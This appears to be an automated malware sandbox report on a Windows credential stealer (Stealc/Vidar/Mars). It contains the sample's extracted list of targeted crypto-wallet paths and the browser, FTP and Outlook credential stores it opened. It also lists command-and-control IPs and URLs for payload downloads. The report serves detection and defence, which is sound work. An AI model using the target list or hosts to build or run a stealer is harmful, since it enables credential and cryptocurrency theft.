Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1506072996.0000000001FC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 25bb638aac.exe PID: 2184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1464470 Sample: Zachv5lCuu.exe Startdate: 28/06/2024 Architecture: WINDOWS Score: 100 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Antivirus detection for URL or domain 2->70 72 15 other signatures 2->72 9 Zachv5lCuu.exe 37 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        process3 dnsIp4 52 85.28.47.4, 49704, 49719, 80 GES-ASRU Russian Federation 9->52 54 77.91.77.81, 49705, 49718, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->54 40 C:\Users\user\AppData\...behaviorgraphHCGDAFCFH.exe, PE32 9->40 dropped 42 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->42 dropped 44 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->44 dropped 46 11 other files (7 malicious) 9->46 dropped 90 Detected unpacking (changes PE section rights) 9->90 92 Tries to steal Mail credentials (via file / registry access) 9->92 94 Found many strings related to Crypto-Wallets (likely being stolen) 9->94 102 4 other signatures 9->102 18 cmd.exe 1 9->18         started        20 cmd.exe 2 9->20         started        96 Hides threads from debuggers 14->96 98 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->98 100 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->100 file5 signatures6 process7 process8 22 GHCGDAFCFH.exe 4 18->22         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        file9 38 C:\Users\user\AppData\Local\...\explorti.exe, PE32 22->38 dropped 82 Antivirus detection for dropped file 22->82 84 Multi AV Scanner detection for dropped file 22->84 86 Detected unpacking (changes PE section rights) 22->86 88 7 other signatures 22->88 30 explorti.exe 16 22->30         started        signatures10 process11 dnsIp12 56 77.91.77.82, 49717, 49720, 49721 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 30->56 48 C:\Users\user\AppData\...\25bb638aac.exe, PE32 30->48 dropped 50 C:\Users\user\AppData\Local\...\random[1].exe, PE32 30->50 dropped 58 Antivirus detection for dropped file 30->58 60 Multi AV Scanner detection for dropped file 30->60 62 Detected unpacking (changes PE section rights) 30->62 64 6 other signatures 30->64 35 25bb638aac.exe 12 30->35         started        file13 signatures14 process15 signatures16 74 Antivirus detection for dropped file 35->74 76 Multi AV Scanner detection for dropped file 35->76 78 Detected unpacking (changes PE section rights) 35->78 80 2 other signatures 35->80
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • Avira URL Cloud: malware
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown